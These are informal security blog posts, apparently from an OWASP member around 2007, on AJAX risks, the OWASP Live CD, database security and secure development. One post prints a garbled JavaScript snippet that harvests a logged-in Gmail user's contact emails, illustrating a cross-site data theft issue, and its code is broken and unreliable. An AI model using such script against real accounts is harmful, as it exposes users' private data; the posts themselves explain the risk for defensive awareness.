Eoin Keary

Just to round up a discussion I was having with some AJAX developers regarding the use of the eval() function and innerHTML function in javascript.

These functions are comminly used to populate dynamic sections of a web page without reloading the page itself (Web 2.0 as the spindoctors call it).

so if we have  a simple javascript function that rewrites text displayed depending on what the user typed in:

so, as we push content back onto the client ala gmail we get issues like this:

 http://cyber-knowledge.net/blog/2007/01/01/gmail-vulnerable-to-contact-list-hijacking/

Upon logging into gmail and then visiting a malicious site the contacts list for ones gmail account can be downloaded. The reason for this is that contect in saved in a javascript client side object. One can traverse as follows:

function google(a){
var emails;
emails = “”
emails = “” a.Body.Contacts[0].Email ” ”
for(i=1;i<a;i++>” a.Body.Contacts[i].Email “”;
}
emails = “”
document.write(emails);
}

Looks to me we are revistiing old security issues such as client side logic manipulation and our clients are getting fatter, like our people, which goes against the www architecture model?

-ek

The OWASP Live CD is an OWASP initiative aimed at producing a physical artifact for use by security persons. It should be released very soon and shall contain plenty of OWASP tools and other open source tools. It shall also contain electronic version sof the OWASP guides currently published namely; The Guide (development guide) and the testing guide (to be released ths month).

Anyone attending the next OWASP Ireland chapter meeting can get a free copy of the Live CD. Meeting TBA.

-ek

David Litchfield (of NGS) wrote an article comparing Microsoft SQL Server and Oracle databases. here

It highlighted that both had their problems from a security standpoint. Historically I always got excited when I found an Oracle or SQL server during a security assessment as one could always exploit either to some degree to make for some interesting reading.

The main point to be made is the Microsofts SDL is having impact on the secure code development of their products (about time) and that implementing a Secure SDLC (Software development Life cycle) an dintegrating security into development is still the best way to produce secure apps;

As mentioned in my App Sec (USA) 2006 presentation (Seattle) here that the pen and patch approach is unsustainable and not good engineering (albeit it is a fun part of security).

 I read comments on some Irish security mail lists saying that you can not compare SQL Server with Oracle as Oracle is written for mulitplatform wherein SQL server is Win only. This is one of the problems the software industry suffers from….ignorance. Just because a product is built to run on more that one OS that does not give it a right to be of inferior quality.

Software is software after all, and if a development organisation implements a secure SDLC the underlaying operating system should not matter.

Application security, Hmmmm, Who knows what is going to be the “Big One” in 2007.

We (OWASP) just finished the Testing Guide which is currently in draft, should be out soon. This focuses on server-side code mostly as traditionally server side code is where the security focus would be at.

With AJAX and all this asynchronous stuff, now we have “thicker clients” even though the web direction was to go “thin”. We (and our code/clients) are all getting fatter again. Too many cheese burgers in my case.

Javascript exploits are getting more common and very interesting and these types of attack are great for our friend “Identity theft”.

Forget SQL injection or access via a vulnerable port/bypassing a firewall, the old ways are normally the best…simply steal someones identity and suck the money from thier account. I believe this “WEB 2.0″ model will enable more of these types of exploits to occur.